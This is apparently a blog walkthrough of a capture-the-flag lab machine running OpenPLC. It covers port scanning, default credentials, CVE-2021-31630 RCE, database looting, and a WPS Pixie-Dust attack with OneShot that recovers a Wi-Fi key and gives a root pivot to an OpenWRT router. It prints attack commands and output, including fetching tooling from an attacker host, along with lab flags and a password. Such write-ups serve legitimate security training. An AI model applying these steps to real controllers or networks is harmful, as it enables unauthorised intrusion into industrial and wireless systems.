Command Palette

Search for a command to run...

Blog
PreviousNext

Wifinetic Two - Walkthrough

WifineticTwo is a medium-difficulty Linux machine that features OpenPLC running on port 8080, vulnerable to Remote Code Execution through the manual exploitation of CVE-2021-31630. After obtaining an initial foothold on the machine, a WPS attack is performed to acquire the Wi-Fi password for an Access Point (AP). This access allows the attacker to target the router running OpenWRT and gain a root shell via its web interface.

Reconnaissance

During the initial phase, the goal is to discover exposed services, versions, and quick wins that shape the attack surface.

sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn --disable-arp-ping 10.10.11.7 -oG allPorts
 
PORT     STATE SERVICE    REASON
22/tcp   open  ssh        syn-ack ttl 63
8080/tcp open  http-proxy syn-ack ttl 63
sudo nmap -p22,80 -sCV 10.10.11.7 -oN targeted
 
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
8080/tcp open  http-proxy Werkzeug/1.0.1 Python/2.7.18

The web service on 8080 appears to be an OpenPLC interface (Werkzeug/Python stack). We’ll keep a visual note of the target interface for later correlation.

google

Enumeration

At this stage, we dig into each exposed service to extract actionable details.

  • OpenPLC on port 8080 suggests common defaults and publicly documented issues.
  • Try known/default creds when appropriate for lab environments: openplc:openplc.
  • Relevant references for the OpenPLC RCE (CVE-2021-31630):

These indicate a path to remote code execution on the OpenPLC web interface.

Foothold

Obtain the initial shell by leveraging the OpenPLC RCE to execute commands on the host. Once a foothold is established, stabilize the shell and validate basic context.

cat /root/user.txt

User flag: 5962b4c07d2a287964cb03c07b58fe5a

Post-Exploitation

With a working shell, focus on internal discovery and preparing for escalation or lateral movement.

  • Upgrade TTY: Improve interactivity following the HackTricks TTY upgrade guide.
  • Application Artifacts: Inspect app directories for configs, databases, and credentials.
ls
active_program  lib             openplc.py   scripts       webserver.py
core            monitoring.py   openplc.pyc  static
dnp3.cfg        monitoring.pyc  pages.py     st_files
iec2c           openplc.db      pages.pyc    st_optimizer
file openplc.db
openplc.db: SQLite 3.x database, last written using SQLite version 3037002, file counter 507, database pages 10, cookie 0xc, schema 4, UTF-8, version-valid-for 507
sqlite3 openplc.db
sqlite> .tables
Programs   Settings   Slave_dev  Users
sqlite> .schema Users
CREATE TABLE IF NOT EXISTS "Users" (
	`user_id`	INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
	`name`	TEXT NOT NULL,
	`username`	TEXT NOT NULL UNIQUE,
	`email`	TEXT,
	`password`	TEXT NOT NULL,
	`pict_file`	TEXT
);
sqlite> select * from Users;
10|OpenPLC User|openplc|[email protected]|openplc|

If wireless interfaces are present, evaluate whether Wi‑Fi access can expand reach or enable router targeting (common in IoT/ICS lab setups). Reference: HackTricks WiFi Pentesting

root@attica03:/opt/PLC/OpenPLC_v3/webserver# iw dev wlan0 scan
BSS 02:00:00:00:01:00(on wlan0)
	last seen: 4438.704s [boottime]
	TSF: 1712316111136774 usec (19818d, 11:21:51)
	freq: 2412
	beacon interval: 100 TUs
	capability: ESS Privacy ShortSlotTime (0x0411)
	signal: -30.00 dBm
	last seen: 0 ms ago
	Information elements from Probe Response frame:
	SSID: plcrouter
	Supported rates: 1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0
	DS Parameter set: channel 1
	ERP: Barker_Preamble_Mode
	Extended supported rates: 24.0 36.0 48.0 54.0
	RSN:	 * Version: 1
		 * Group cipher: CCMP
		 * Pairwise ciphers: CCMP
		 * Authentication suites: PSK
		 * Capabilities: 1-PTKSA-RC 1-GTKSA-RC (0x0000)
	Supported operating classes:
		 * current operating class: 81
	Extended capabilities:
		 * Extended Channel Switching
		 * SSID List
		 * Operating Mode Notification
	WPS:	 * Version: 1.0
		 * Wi-Fi Protected Setup State: 2 (Configured)
		 * Response Type: 3 (AP)
		 * UUID: 572cf82f-c957-5653-9b16-b5cfb298abf1
		 * Manufacturer:
		 * Model:
		 * Model Number:
		 * Serial Number:
		 * Primary Device Type: 0-00000000-0
		 * Device name:
		 * Config methods: Label, Display, Keypad
		 * Version2: 2.0

Privilege Escalation

If the target environment relies on a nearby AP/router (e.g., OpenWRT), obtaining wireless credentials can provide a route to higher-privileged components or management interfaces.

Prepare tooling (OneShot) and staging:

git clone https://github.com/nikita-yfh/OneShot-C.git
cd OneShot-C
make
python3 -m http.server 80
root@attica03:/opt/PLC/OpenPLC_v3/webserver# curl http://10.10.14.52/oneshot -o
root@attica03:/opt/PLC/OpenPLC_v3/webserver# chmod +x oneshot

Validate interface state and attempt the WPS attack to derive the PSK:

ip a s wlan0
7: wlan0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc mq state DOWN group default qlen 1000
    link/ether 02:00:00:00:04:00 brd ff:ff:ff:ff:ff:ff
root@attica03:/opt/PLC/OpenPLC_v3/webserver# ./oneshot -b 02:00:00:00:01:00 -K -i wlan0
[*] Running wpa_supplicant...
[*] Trying pin 12345670...
[*] Scanning...
[*] Authenticating...
[+] Authenticated
[*] Associating with AP...
[+] Associated with 02:00:00:00:01:00 (ESSID: plcrouter)
[*] Received Identity Request
[*] Sending Identity Response...
[*] Received WPS Message M1
[P] E-Nonce: a0d569681ac26464c06619c6f4952ff1
[*] Building Message M2
[P] PKR: 0d5d...
[P] PKE: f831...
[P] Authkey: 2f82...
[*] Received WPS Message M3
[P] E-Hash1: e0af...
[P] E-Hash2: 465c...
[*] Building Message M4
[*] Received WPS Message M5
[*] Building Message M6
[*] Received WPS Message M7
[+] WPS PIN: 12345670
[+] WPA PSK: NoWWEDoKnowWhaTisReal123!
[+] AP SSID: plcrouter

Generate a working network profile and attempt association:

wpa_passphrase plcrouter NoWWEDoKnowWhaTisReal123! > config
cat config
network={
	ssid="plcrouter"
	#psk="NoWWEDoKnowWhaTisReal123!"
	psk=2bafe4e17630ef1834eaa9fa5c4d81fa5ef093c4db5aac5c03f1643fef02d156
}
wpa_supplicant -B -c config -i wlan0
Successfully initialized wpa_supplicant
rfkill: Cannot open RFKILL control device
rfkill: Cannot get wiphy information
nl80211: Could not set interface 'p2p-dev-wlan0' UP
nl80211: deinit ifname=p2p-dev-wlan0 disabled_11b_rates=0
p2p-dev-wlan0: Failed to initialize driver interface
p2p-dev-wlan0: CTRL-EVENT-DSCP-POLICY clear_all
P2P: Failed to enable P2P Device interface

Manually assign an IP (lab context) and pivot to the router's management plane (OpenWRT):

ifconfig wlan0 192.168.1.7 netmask 255.255.255.0
ssh [email protected]
cat root.txt

Root flag: 33445bbba1381eb24ca2d19d0c51fa0d